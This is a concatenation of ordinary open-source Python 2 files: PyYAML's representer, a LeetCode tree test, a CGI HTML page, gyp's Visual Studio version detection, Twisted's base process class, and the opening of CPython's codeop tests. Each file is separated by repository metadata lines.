if hasattr(mapping, 'items'):
mapping = mapping.items()
mapping.sort()
for item_key, item_value in mapping:
node_key = self.represent_data(item_key)
node_value = self.represent_data(item_value)
if not (isinstance(node_key, ScalarNode) and not node_key.style):
best_style = False
if not (isinstance(node_value, ScalarNode) and not node_value.style):
best_style = False
value.append((node_key, node_value))
if flow_style is None:
if self.default_flow_style is not None:
node.flow_style = self.default_flow_style
else:
node.flow_style = best_style
return node
def ignore_aliases(self, data):
return False
class SafeRepresenter(BaseRepresenter):
def ignore_aliases(self, data):
if data in [None, ()]:
return True
if isinstance(data, (str, unicode, bool, int, float)):
return True
def represent_none(self, data):
return self.represent_scalar(u'tag:yaml.org,2002:null',
u'null')
def represent_str(self, data):
tag = None
style = None
try:
data = unicode(data, 'ascii')
tag = u'tag:yaml.org,2002:str'
except UnicodeDecodeError:
try:
data = unicode(data, 'utf-8')
tag = u'tag:yaml.org,2002:str'
except UnicodeDecodeError:
data = data.encode('base64')
tag = u'tag:yaml.org,2002:binary'
style = '|'
return self.represent_scalar(tag, data, style=style)
def represent_unicode(self, data):
return self.represent_scalar(u'tag:yaml.org,2002:str', data)
def represent_bool(self, data):
if data:
value = u'true'
else:
value = u'false'
return self.represent_scalar(u'tag:yaml.org,2002:bool', value)
def represent_int(self, data):
return self.represent_scalar(u'tag:yaml.org,2002:int', unicode(data))
def represent_long(self, data):
return self.represent_scalar(u'tag:yaml.org,2002:int', unicode(data))
inf_value = 1e300
while repr(inf_value) != repr(inf_value*inf_value):
inf_value *= inf_value
def represent_float(self, data):
if data != data or (data == 0.0 and data == 1.0):
value = u'.nan'
elif data == self.inf_value:
value = u'.inf'
elif data == -self.inf_value:
value = u'-.inf'
else:
value = unicode(repr(data)).lower()
# Note that in some cases `repr(data)` represents a float number
# without the decimal parts. For instance:
# >>> repr(1e17)
# '1e17'
# Unfortunately, this is not a valid float representation according
# to the definition of the `!!float` tag. We fix this by adding
# '.0' before the 'e' symbol.
if u'.' not in value and u'e' in value:
value = value.replace(u'e', u'.0e', 1)
return self.represent_scalar(u'tag:yaml.org,2002:float', value)
def represent_list(self, data):
#pairs = (len(data) > 0 and isinstance(data, list))
#if pairs:
# for item in data:
# if not isinstance(item, tuple) or len(item) != 2:
# pairs = False
# break
#if not pairs:
return self.represent_sequence(u'tag:yaml.org,2002:seq', data)
#value = []
#for item_key, item_value in data:
# value.append(self.represent_mapping(u'tag:yaml.org,2002:map',
# [(item_key, item_value)]))
#return SequenceNode(u'tag:yaml.org,2002:pairs', value)
def represent_dict(self, data):
return self.represent_mapping(u'tag:yaml.org,2002:map', data)
def represent_set(self, data):
value = {}
for key in data:
value[key] = None
return self.represent_mapping(u'tag:yaml.org,2002:set', value)
def represent_date(self, data):
value = unicode(data.isoformat())
return self.represent_scalar(u'tag:yaml.org,2002:timestamp', value)
def represent_datetime(self, data):
value = unicode(data.isoformat(' '))
return self.represent_scalar(u'tag:yaml.org,2002:timestamp', value)
def represent_yaml_object(self, tag, data, cls, flow_style=None):
if hasattr(data, '__getstate__'):
state = data.__getstate__()
else:
state = data.__dict__.copy()
return self.represent_mapping(tag, state, flow_style=flow_style)
def represent_undefined(self, data):
raise RepresenterError("cannot represent an object: %s" % data)
SafeRepresenter.add_representer(type(None),
SafeRepresenter.represent_none)
SafeRepresenter.add_representer(str,
SafeRepresenter.represent_str)
SafeRepresenter.add_representer(unicode,
SafeRepresenter.represent_unicode)
SafeRepresenter.add_representer(bool,
SafeRepresenter.represent_bool)
SafeRepresenter.add_representer(int,
SafeRepresenter.represent_int)
SafeRepresenter.add_representer(long,
SafeRepresenter.represent_long)
SafeRepresenter.add_representer(float,
SafeRepresenter.represent_float)
SafeRepresenter.add_representer(list,
SafeRepresenter.represent_list)
SafeRepresenter.add_representer(tuple,
SafeRepresenter.represent_list)
SafeRepresenter.add_representer(dict,
SafeRepresenter.represent_dict)
SafeRepresenter.add_representer(set,
SafeRepresenter.represent_set)
SafeRepresenter.add_representer(datetime.date,
SafeRepresenter.represent_date)
SafeRepresenter.add_representer(datetime.datetime,
SafeRepresenter.represent_datetime)
SafeRepresenter.add_representer(None,
SafeRepresenter.represent_undefined)
class Representer(SafeRepresenter):
def represent_str(self, data):
tag = None
style = None
try:
data = unicode(data, 'ascii')
tag = u'tag:yaml.org,2002:str'
except UnicodeDecodeError:
try:
data = unicode(data, 'utf-8')
tag = u'tag:yaml.org,2002:python/str'
except UnicodeDecodeError:
data = data.encode('base64')
tag = u'tag:yaml.org,2002:binary'
style = '|'
return self.represent_scalar(tag, data, style=style)
def represent_unicode(self, data):
tag = None
try:
data.encode('ascii')
tag = u'tag:yaml.org,2002:python/unicode'
except UnicodeEncodeError:
tag = u'tag:yaml.org,2002:str'
return self.represent_scalar(tag, data)
def represent_long(self, data):
tag = u'tag:yaml.org,2002:int'
if int(data) is not data:
tag = u'tag:yaml.org,2002:python/long'
return self.represent_scalar(tag, unicode(data))
def represent_complex(self, data):
if data.imag == 0.0:
data = u'%r' % data.real
elif data.real == 0.0:
data = u'%rj' % data.imag
elif data.imag > 0:
data = u'%r+%rj' % (data.real, data.imag)
else:
data = u'%r%rj' % (data.real, data.imag)
return self.represent_scalar(u'tag:yaml.org,2002:python/complex', data)
def represent_tuple(self, data):
return self.represent_sequence(u'tag:yaml.org,2002:python/tuple', data)
def represent_name(self, data):
name = u'%s.%s' % (data.__module__, data.__name__)
return self.represent_scalar(u'tag:yaml.org,2002:python/name:'+name, u'')
def represent_module(self, data):
return self.represent_scalar(
u'tag:yaml.org,2002:python/module:'+data.__name__, u'')
def represent_instance(self, data):
# For instances of classic classes, we use __getinitargs__ and
# __getstate__ to serialize the data.
# If data.__getinitargs__ exists, the object must be reconstructed by
# calling cls(**args), where args is a tuple returned by
# __getinitargs__. Otherwise, the cls.__init__ method should never be
# called and the class instance is created by instantiating a trivial
# class and assigning to the instance's __class__ variable.
# If data.__getstate__ exists, it returns the state of the object.
# Otherwise, the state of the object is data.__dict__.
# We produce either a !!python/object or !!python/object/new node.
# If data.__getinitargs__ does not exist and state is a dictionary, we
# produce a !!python/object node . Otherwise we produce a
# !!python/object/new node.
cls = data.__class__
class_name = u'%s.%s' % (cls.__module__, cls.__name__)
args = None
state = None
if hasattr(data, '__getinitargs__'):
args = list(data.__getinitargs__())
if hasattr(data, '__getstate__'):
state = data.__getstate__()
else:
state = data.__dict__
if args is None and isinstance(state, dict):
return self.represent_mapping(
u'tag:yaml.org,2002:python/object:'+class_name, state)
if isinstance(state, dict) and not state:
return self.represent_sequence(
u'tag:yaml.org,2002:python/object/new:'+class_name, args)
value = {}
if args:
value['args'] = args
value['state'] = state
return self.represent_mapping(
u'tag:yaml.org,2002:python/object/new:'+class_name, value)
def represent_object(self, data):
# We use __reduce__ API to save the data. data.__reduce__ returns
# a tuple of length 2-5:
# (function, args, state, listitems, dictitems)
# For reconstructing, we calls function(*args), then set its state,
# listitems, and dictitems if they are not None.
# A special case is when function.__name__ == '__newobj__'. In this
# case we create the object with args[0].__new__(*args).
# Another special case is when __reduce__ returns a string - we don't
# support it.
# We produce a !!python/object, !!python/object/new or
# !!python/object/apply node.
cls = type(data)
if cls in copy_reg.dispatch_table:
reduce = copy_reg.dispatch_table[cls](data)
elif hasattr(data, '__reduce_ex__'):
reduce = data.__reduce_ex__(2)
elif hasattr(data, '__reduce__'):
reduce = data.__reduce__()
else:
raise RepresenterError("cannot represent object: %r" % data)
reduce = (list(reduce)+[None]*5)[:5]
function, args, state, listitems, dictitems = reduce
args = list(args)
if state is None:
state = {}
if listitems is not None:
listitems = list(listitems)
if dictitems is not None:
dictitems = dict(dictitems)
if function.__name__ == '__newobj__':
function = args[0]
args = args[1:]
tag = u'tag:yaml.org,2002:python/object/new:'
newobj = True
else:
tag = u'tag:yaml.org,2002:python/object/apply:'
newobj = False
function_name = u'%s.%s' % (function.__module__, function.__name__)
if not args and not listitems and not dictitems \
and isinstance(state, dict) and newobj:
return self.represent_mapping(
u'tag:yaml.org,2002:python/object:'+function_name, state)
if not listitems and not dictitems \
and isinstance(state, dict) and not state:
return self.represent_sequence(tag+function_name, args)
value = {}
if args:
value['args'] = args
if state or not isinstance(state, dict):
value['state'] = state
if listitems:
value['listitems'] = listitems
if dictitems:
value['dictitems'] = dictitems
return self.represent_mapping(tag+function_name, value)
Representer.add_representer(str,
Representer.represent_str)
Representer.add_representer(unicode,
Representer.represent_unicode)
Representer.add_representer(long,
Representer.represent_long)
Representer.add_representer(complex,
Representer.represent_complex)
Representer.add_representer(tuple,
Representer.represent_tuple)
Representer.add_representer(type,
Representer.represent_name)
Representer.add_representer(types.ClassType,
Representer.represent_name)
Representer.add_representer(types.FunctionType,
Representer.represent_name)
Representer.add_representer(types.BuiltinFunctionType,
Representer.represent_name)
Representer.add_representer(types.ModuleType,
Representer.represent_module)
Representer.add_multi_representer(types.InstanceType,
Representer.represent_instance)
Representer.add_multi_representer(object,
Representer.represent_object)
|
zhlinh/leetcode
|
refs/heads/master
|
0108.Convert Sorted Array to Binary Search Tree/test.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from solution import Solution
from solution import TreeNode
def constructOne(s):
s = s.strip()
if s == '#':
return None
else:
return TreeNode(int(s))
def createTree(tree):
q = []
tree = tree.split(",")
root = constructOne(tree[0]);
q.append(root);
idx = 1;
while q:
tn = q.pop(0)
if not tn:
continue
if idx == len(tree):
break
left = constructOne(tree[idx])
tn.left = left
q.append(left)
idx += 1
if idx == len(tree):
break
right = constructOne(tree[idx])
idx += 1
tn.right = right
q.append(right)
return root
def printNode(tn, indent):
sb = ""
for i in range(indent):
sb += "\t"
sb += str(tn.val)
print(sb)
def printTree(root, indent):
if not root:
return
printTree(root.right, indent + 1)
printNode(root, indent)
printTree(root.left, indent + 1)
nums = [1, 2, 3, 4, 5]
sol = Solution()
res = sol.sortedArrayToBST(nums)
printTree(res, 0)
|
aayushchugh07/qbo-browser
|
refs/heads/master
|
btp3/cgi/test4.py
|
3
|
#!/usr/bin/env python
print "Content-type: text/html"
print
# print "<html><head><title>Situation snapshot</title></head>"
# print "<body><pre>"
# print "fff"
# objects=['Book_copy','Book_'];
# for object in objects:
# print object;
# print "</pre></body></html>"
print '''<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Library-QBO</title>
<!-- Bootstrap -->
<link href="/css/bootstrap.min.css" rel="stylesheet">
<!-- Extra theme that will screw up everything -->
<!-- link href="/css/bootstrap-theme.min.css" rel="stylesheet" -->
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
<script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body>
<!-- h2>Library-QBO</h2 -->
<div class="navbar navbar-default">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#">Library-QBO</a>
</div>
<div class="navbar-collapse collapse">
<ul class="nav navbar-nav">
<li class="active"><a href="#">Home</a></li>
<li><a href="#about">About</a></li>
<li><a href="#contact">Contact</a></li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">Dropdown <b class="caret"></b></a>
<ul class="dropdown-menu">
<li><a href="#">Action</a></li>
<li><a href="#">Another action</a></li>
<li><a href="#">Something else here</a></li>
<li class="divider"></li>
<li class="dropdown-header">Nav header</li>
<li><a href="#">Separated link</a></li>
<li><a href="#">One more separated link</a></li>
</ul>
</li>
</ul>
</div><!--/.nav-collapse -->
</div>
</div>
<hr />
<h3>Tables</h3>
<p>Click on a table to add a new bag</p>
<div class="row">
<!-- Put elements below with div class=col-md-2 to get wrapping in columns -->
<!-- div class="col-md-2">
<h2>Heading</h2>
<p>Donec id elit non mi porta gravida at eget metus. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Etiam porta sem malesuada magna mollis euismod. Donec sed odio dui. </p>
<p><a class="btn btn-default" href="#" role="button">View details »</a></p>
</div -->
<div class="col-md-1">
<div align="center">
<img src="/images/People.png" width="60px" height="60px" />
</div>
<p align="center">Customers</p>
</div>
<div class="col-md-1">
<div align="center">
<img src="/images/People.png" width="60px" height="60px" />
</div>
<p align="center">Customers</p>
</div>
<div class="col-md-1">
<div align="center">
<img src="/images/People.png" width="60px" height="60px" />
</div>
<p align="center">Customers</p>
</div>
</div> <!-- /row -->
<hr />
<h3>Bags</h3>
<p>Select one or two bags to perform operations</p>
<div class="row">
<div class="col-md-1">
<div align="center" style="padding-top: 12px;">
<img src="/images/People.png" width="60px" height="60px" />
</div>
<p align="center">Customers</p>
</div>
<div class="col-md-2">
<div class="panel panel-default">
<div class="panel-heading">
<div align="center" class="dropdown-toggle" data-toggle="dropdown">
<img src="/images/People.png" width="60px" height="60px" align="center"/>
<button class="btn btn-info dropdown-toggle" data-toggle="dropdown" data-hover="dropdown"><b class="caret"></b></button>
<ul class="dropdown-menu" align="center">
<li><a tabindex="-1" href="#">View data</a></li>
<li class="divider"></li>
<li><a tabindex="-1" href="#">Deselect</a></li>
<li><a tabindex="-1" href="#">Delete</a></li>
</ul>
<p align="center">Customers</p>
</div>
</div>
</div>
</div>
</div>
<hr />
<h3>Operations</h3>
<p>Click on an operation for selected table(s)</p>
<div class="row">
<div class="col-md-1">
<div align="center">
<img src="/images/People.png" width="60px" height="60px" align="center"/>
<p align="center">Operation2</p>
</div>
</div>
<div class="col-md-1">
<div align="center">
<img src="/images/People.png" width="60px" height="60px" align="center"/>
<p align="center">Operation1</p>
</div>
</div>
</div>
<!-- /div -->
<!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>
<!-- Include all compiled plugins (below), or include individual files as needed -->
<script src="/js/bootstrap.min.js"></script>
<!-- <div class="dropdown theme-dropdown clearfix"> -->
<!-- <a id="dropdownMenu1" href="#" role="button" class="sr-only dropdown-toggle" data-toggle="dropdown" > -->
<!-- >Dropdown <b class="caret"></b></a > -->
<!-- <ul class="dropdown-menu" role="menu" aria-labelledby="dropdownMenu1" > -->
<!-- <li class="active" role="presentation"><a role="menuitem" tabindex="-1" href="#">Action</a></li> -->
<!-- <li role="presentation"><a role="menuitem" tabindex="-1" href="#">Another action</a></li> -->
<!-- <li role="presentation"><a role="menuitem" tabindex="-1" href="#">Something else here</a></li> -->
<!-- <li role="presentation" class="divider"></li> -->
<!-- <li role="presentation"><a role="menuitem" tabindex="-1" href="#">Separated link</a></li> -->
<!-- </ul > -->
<!-- </div> -->
<!-- <div class="btn-group"> -->
<!-- <button class="btn btn-primary dropdown-toggle" data-toggle="dropdown" data-hover="dropdown">Primary <span class="caret"></span></button> -->
<!-- <class="dropdown-menu"> -->
<!-- <ul> -->
<!-- <li><a href="#">Action</a></li> -->
<!-- <li><a href="#">Another action</a></li> -->
<!-- <li><a href="#">Something else here</a></li> -->
<!-- <li class="divider"></li> -->
<!-- <li><a href="#">Separated link</a></li> -->
<!-- </ul> -->
<!-- </div> <\!-- .btn-group -\-> -->
<!-- <a href="#" class="dropdown-toggle js-activated" data-toggle="dropdown">Contact <b class="caret"></b></a> -->
</body>
</html>
'''
|
joegesualdo/dotfiles
|
refs/heads/master
|
config/yarn/global/node_modules/node-gyp/gyp/pylib/gyp/MSVSVersion.py
|
1509
|
# Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Handle version information related to Visual Stuio."""
import errno
import os
import re
import subprocess
import sys
import gyp
import glob
class VisualStudioVersion(object):
"""Information regarding a version of Visual Studio."""
def __init__(self, short_name, description,
solution_version, project_version, flat_sln, uses_vcxproj,
path, sdk_based, default_toolset=None):
self.short_name = short_name
self.description = description
self.solution_version = solution_version
self.project_version = project_version
self.flat_sln = flat_sln
self.uses_vcxproj = uses_vcxproj
self.path = path
self.sdk_based = sdk_based
self.default_toolset = default_toolset
def ShortName(self):
return self.short_name
def Description(self):
"""Get the full description of the version."""
return self.description
def SolutionVersion(self):
"""Get the version number of the sln files."""
return self.solution_version
def ProjectVersion(self):
"""Get the version number of the vcproj or vcxproj files."""
return self.project_version
def FlatSolution(self):
return self.flat_sln
def UsesVcxproj(self):
"""Returns true if this version uses a vcxproj file."""
return self.uses_vcxproj
def ProjectExtension(self):
"""Returns the file extension for the project."""
return self.uses_vcxproj and '.vcxproj' or '.vcproj'
def Path(self):
"""Returns the path to Visual Studio installation."""
return self.path
def ToolPath(self, tool):
"""Returns the path to a given compiler tool. """
return os.path.normpath(os.path.join(self.path, "VC/bin", tool))
def DefaultToolset(self):
"""Returns the msbuild toolset version that will be used in the absence
of a user override."""
return self.default_toolset
def SetupScript(self, target_arch):
"""Returns a command (with arguments) to be used to set up the
environment."""
# Check if we are running in the SDK command line environment and use
# the setup script from the SDK if so. |target_arch| should be either
# 'x86' or 'x64'.
assert target_arch in ('x86', 'x64')
sdk_dir = os.environ.get('WindowsSDKDir')
if self.sdk_based and sdk_dir:
return [os.path.normpath(os.path.join(sdk_dir, 'Bin/SetEnv.Cmd')),
'/' + target_arch]
else:
# We don't use VC/vcvarsall.bat for x86 because vcvarsall calls
# vcvars32, which it can only find if VS??COMNTOOLS is set, which it
# isn't always.
if target_arch == 'x86':
if self.short_name >= '2013' and self.short_name[-1] != 'e' and (
os.environ.get('PROCESSOR_ARCHITECTURE') == 'AMD64' or
os.environ.get('PROCESSOR_ARCHITEW6432') == 'AMD64'):
# VS2013 and later, non-Express have a x64-x86 cross that we want
# to prefer.
return [os.path.normpath(
os.path.join(self.path, 'VC/vcvarsall.bat')), 'amd64_x86']
# Otherwise, the standard x86 compiler.
return [os.path.normpath(
os.path.join(self.path, 'Common7/Tools/vsvars32.bat'))]
else:
assert target_arch == 'x64'
arg = 'x86_amd64'
# Use the 64-on-64 compiler if we're not using an express
# edition and we're running on a 64bit OS.
if self.short_name[-1] != 'e' and (
os.environ.get('PROCESSOR_ARCHITECTURE') == 'AMD64' or
os.environ.get('PROCESSOR_ARCHITEW6432') == 'AMD64'):
arg = 'amd64'
return [os.path.normpath(
os.path.join(self.path, 'VC/vcvarsall.bat')), arg]
def _RegistryQueryBase(sysdir, key, value):
"""Use reg.exe to read a particular key.
While ideally we might use the win32 module, we would like gyp to be
python neutral, so for instance cygwin python lacks this module.
Arguments:
sysdir: The system subdirectory to attempt to launch reg.exe from.
key: The registry key to read from.
value: The particular value to read.
Return:
stdout from reg.exe, or None for failure.
"""
# Skip if not on Windows or Python Win32 setup issue
if sys.platform not in ('win32', 'cygwin'):
return None
# Setup params to pass to and attempt to launch reg.exe
cmd = [os.path.join(os.environ.get('WINDIR', ''), sysdir, 'reg.exe'),
'query', key]
if value:
cmd.extend(['/v', value])
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Obtain the stdout from reg.exe, reading to the end so p.returncode is valid
# Note that the error text may be in [1] in some cases
text = p.communicate()[0]
# Check return code from reg.exe; officially 0==success and 1==error
if p.returncode:
return None
return text
def _RegistryQuery(key, value=None):
r"""Use reg.exe to read a particular key through _RegistryQueryBase.
First tries to launch from %WinDir%\Sysnative to avoid WoW64 redirection. If
that fails, it falls back to System32. Sysnative is available on Vista and
up and available on Windows Server 2003 and XP through KB patch 942589. Note
that Sysnative will always fail if using 64-bit python due to it being a
virtual directory and System32 will work correctly in the first place.
KB 942589 - http://support.microsoft.com/kb/942589/en-us.
Arguments:
key: The registry key.
value: The particular registry value to read (optional).
Return:
stdout from reg.exe, or None for failure.
"""
text = None
try:
text = _RegistryQueryBase('Sysnative', key, value)
except OSError, e:
if e.errno == errno.ENOENT:
text = _RegistryQueryBase('System32', key, value)
else:
raise
return text
def _RegistryGetValueUsingWinReg(key, value):
"""Use the _winreg module to obtain the value of a registry key.
Args:
key: The registry key.
value: The particular registry value to read.
Return:
contents of the registry key's value, or None on failure. Throws
ImportError if _winreg is unavailable.
"""
import _winreg
try:
root, subkey = key.split('\\', 1)
assert root == 'HKLM' # Only need HKLM for now.
with _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, subkey) as hkey:
return _winreg.QueryValueEx(hkey, value)[0]
except WindowsError:
return None
def _RegistryGetValue(key, value):
"""Use _winreg or reg.exe to obtain the value of a registry key.
Using _winreg is preferable because it solves an issue on some corporate
environments where access to reg.exe is locked down. However, we still need
to fallback to reg.exe for the case where the _winreg module is not available
(for example in cygwin python).
Args:
key: The registry key.
value: The particular registry value to read.
Return:
contents of the registry key's value, or None on failure.
"""
try:
return _RegistryGetValueUsingWinReg(key, value)
except ImportError:
pass
# Fallback to reg.exe if we fail to import _winreg.
text = _RegistryQuery(key, value)
if not text:
return None
# Extract value.
match = re.search(r'REG_\w+\s+([^\r]+)\r\n', text)
if not match:
return None
return match.group(1)
def _CreateVersion(name, path, sdk_based=False):
"""Sets up MSVS project generation.
Setup is based off the GYP_MSVS_VERSION environment variable or whatever is
autodetected if GYP_MSVS_VERSION is not explicitly specified. If a version is
passed in that doesn't match a value in versions python will throw a error.
"""
if path:
path = os.path.normpath(path)
versions = {
'2015': VisualStudioVersion('2015',
'Visual Studio 2015',
solution_version='12.00',
project_version='14.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v140'),
'2013': VisualStudioVersion('2013',
'Visual Studio 2013',
solution_version='13.00',
project_version='12.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v120'),
'2013e': VisualStudioVersion('2013e',
'Visual Studio 2013',
solution_version='13.00',
project_version='12.0',
flat_sln=True,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v120'),
'2012': VisualStudioVersion('2012',
'Visual Studio 2012',
solution_version='12.00',
project_version='4.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v110'),
'2012e': VisualStudioVersion('2012e',
'Visual Studio 2012',
solution_version='12.00',
project_version='4.0',
flat_sln=True,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based,
default_toolset='v110'),
'2010': VisualStudioVersion('2010',
'Visual Studio 2010',
solution_version='11.00',
project_version='4.0',
flat_sln=False,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based),
'2010e': VisualStudioVersion('2010e',
'Visual C++ Express 2010',
solution_version='11.00',
project_version='4.0',
flat_sln=True,
uses_vcxproj=True,
path=path,
sdk_based=sdk_based),
'2008': VisualStudioVersion('2008',
'Visual Studio 2008',
solution_version='10.00',
project_version='9.00',
flat_sln=False,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
'2008e': VisualStudioVersion('2008e',
'Visual Studio 2008',
solution_version='10.00',
project_version='9.00',
flat_sln=True,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
'2005': VisualStudioVersion('2005',
'Visual Studio 2005',
solution_version='9.00',
project_version='8.00',
flat_sln=False,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
'2005e': VisualStudioVersion('2005e',
'Visual Studio 2005',
solution_version='9.00',
project_version='8.00',
flat_sln=True,
uses_vcxproj=False,
path=path,
sdk_based=sdk_based),
}
return versions[str(name)]
def _ConvertToCygpath(path):
"""Convert to cygwin path if we are using cygwin."""
if sys.platform == 'cygwin':
p = subprocess.Popen(['cygpath', path], stdout=subprocess.PIPE)
path = p.communicate()[0].strip()
return path
def _DetectVisualStudioVersions(versions_to_check, force_express):
"""Collect the list of installed visual studio versions.
Returns:
A list of visual studio versions installed in descending order of
usage preference.
Base this on the registry and a quick check if devenv.exe exists.
Only versions 8-10 are considered.
Possibilities are:
2005(e) - Visual Studio 2005 (8)
2008(e) - Visual Studio 2008 (9)
2010(e) - Visual Studio 2010 (10)
2012(e) - Visual Studio 2012 (11)
2013(e) - Visual Studio 2013 (12)
2015 - Visual Studio 2015 (14)
Where (e) is e for express editions of MSVS and blank otherwise.
"""
version_to_year = {
'8.0': '2005',
'9.0': '2008',
'10.0': '2010',
'11.0': '2012',
'12.0': '2013',
'14.0': '2015',
}
versions = []
for version in versions_to_check:
# Old method of searching for which VS version is installed
# We don't use the 2010-encouraged-way because we also want to get the
# path to the binaries, which it doesn't offer.
keys = [r'HKLM\Software\Microsoft\VisualStudio\%s' % version,
r'HKLM\Software\Wow6432Node\Microsoft\VisualStudio\%s' % version,
r'HKLM\Software\Microsoft\VCExpress\%s' % version,
r'HKLM\Software\Wow6432Node\Microsoft\VCExpress\%s' % version]
for index in range(len(keys)):
path = _RegistryGetValue(keys[index], 'InstallDir')
if not path:
continue
path = _ConvertToCygpath(path)
# Check for full.
full_path = os.path.join(path, 'devenv.exe')
express_path = os.path.join(path, '*express.exe')
if not force_express and os.path.exists(full_path):
# Add this one.
versions.append(_CreateVersion(version_to_year[version],
os.path.join(path, '..', '..')))
# Check for express.
elif glob.glob(express_path):
# Add this one.
versions.append(_CreateVersion(version_to_year[version] + 'e',
os.path.join(path, '..', '..')))
# The old method above does not work when only SDK is installed.
keys = [r'HKLM\Software\Microsoft\VisualStudio\SxS\VC7',
r'HKLM\Software\Wow6432Node\Microsoft\VisualStudio\SxS\VC7']
for index in range(len(keys)):
path = _RegistryGetValue(keys[index], version)
if not path:
continue
path = _ConvertToCygpath(path)
if version != '14.0': # There is no Express edition for 2015.
versions.append(_CreateVersion(version_to_year[version] + 'e',
os.path.join(path, '..'), sdk_based=True))
return versions
def SelectVisualStudioVersion(version='auto', allow_fallback=True):
"""Select which version of Visual Studio projects to generate.
Arguments:
version: Hook to allow caller to force a particular version (vs auto).
Returns:
An object representing a visual studio project format version.
"""
# In auto mode, check environment variable for override.
if version == 'auto':
version = os.environ.get('GYP_MSVS_VERSION', 'auto')
version_map = {
'auto': ('14.0', '12.0', '10.0', '9.0', '8.0', '11.0'),
'2005': ('8.0',),
'2005e': ('8.0',),
'2008': ('9.0',),
'2008e': ('9.0',),
'2010': ('10.0',),
'2010e': ('10.0',),
'2012': ('11.0',),
'2012e': ('11.0',),
'2013': ('12.0',),
'2013e': ('12.0',),
'2015': ('14.0',),
}
override_path = os.environ.get('GYP_MSVS_OVERRIDE_PATH')
if override_path:
msvs_version = os.environ.get('GYP_MSVS_VERSION')
if not msvs_version:
raise ValueError('GYP_MSVS_OVERRIDE_PATH requires GYP_MSVS_VERSION to be '
'set to a particular version (e.g. 2010e).')
return _CreateVersion(msvs_version, override_path, sdk_based=True)
version = str(version)
versions = _DetectVisualStudioVersions(version_map[version], 'e' in version)
if not versions:
if not allow_fallback:
raise ValueError('Could not locate Visual Studio installation.')
if version == 'auto':
# Default to 2005 if we couldn't find anything
return _CreateVersion('2005', None)
else:
return _CreateVersion(version, None)
return versions[0]
|
ecolitan/fatics
|
refs/heads/master
|
venv/lib/python2.7/site-packages/twisted/internet/_baseprocess.py
|
38
|
# -*- test-case-name: twisted.test.test_process -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Cross-platform process-related functionality used by different
L{IReactorProcess} implementations.
"""
from twisted.python.reflect import qual
from twisted.python.deprecate import getWarningMethod
from twisted.python.failure import Failure
from twisted.python.log import err
from twisted.persisted.styles import Ephemeral
_missingProcessExited = ("Since Twisted 8.2, IProcessProtocol.processExited "
"is required. %s must implement it.")
class BaseProcess(Ephemeral):
pid = None
status = None
lostProcess = 0
proto = None
def __init__(self, protocol):
self.proto = protocol
def _callProcessExited(self, reason):
default = object()
processExited = getattr(self.proto, 'processExited', default)
if processExited is default:
getWarningMethod()(
_missingProcessExited % (qual(self.proto.__class__),),
DeprecationWarning, stacklevel=0)
else:
processExited(Failure(reason))
def processEnded(self, status):
"""
This is called when the child terminates.
"""
self.status = status
self.lostProcess += 1
self.pid = None
self._callProcessExited(self._getReason(status))
self.maybeCallProcessEnded()
def maybeCallProcessEnded(self):
"""
Call processEnded on protocol after final cleanup.
"""
if self.proto is not None:
reason = self._getReason(self.status)
proto = self.proto
self.proto = None
try:
proto.processEnded(Failure(reason))
except:
err(None, "unexpected error in processEnded")
|
wskplho/sl4a
|
refs/heads/master
|
python/src/Lib/test/test_codeop.py
|
84
|
"""
Test cases for codeop.py
Nick Mathewson
"""
import unittest
from test.test_support import run_unittest, is_jython
from codeop import compile_command, PyCF_DONT_IMPLY_DEDENT
if is_jython:
import sys
import cStringIO
def unify_callables(d):
for n,v in d.items():
if callable(v):
d[n] = callable
return d
class CodeopTests(unittest.TestCase):
def assertValid(self, str, symbol='single'):
'''succeed iff str is a valid piece of code'''
if is_jython:
code = compile_command(str, "<input>", symbol)
self.assert_(code)
if symbol == "single":
d,r = {},{}
saved_stdout = sys.stdout
sys.stdout = cStringIO.StringIO()
try:
exec code in d
exec compile(str,"<input>","single") in r
finally:
sys.stdout = saved_stdout
elif symbol == 'eval':
ctx = {'a': 2}
d = { 'value': eval(code,ctx) }
r = { 'value': eval(str,ctx) }
self.assertEquals(unify_callables(r),unify_callables(d))
else:
expected = compile(str, "<input>", symbol, PyCF_DONT_IMPLY_DEDENT)
self.assertEquals( compile_command(str, "<input>", symbol), expected)
def assertIncomplete(self, str, symbol='single'):
'''succeed iff str is the start of a valid piece of code'''
self.assertEquals( compile_command(str, symbol=symbol), None)
def assertInvalid(self, str, symbol='single', is_syntax=1):
'''succeed iff str is the start of an invalid piece of code'''
try:
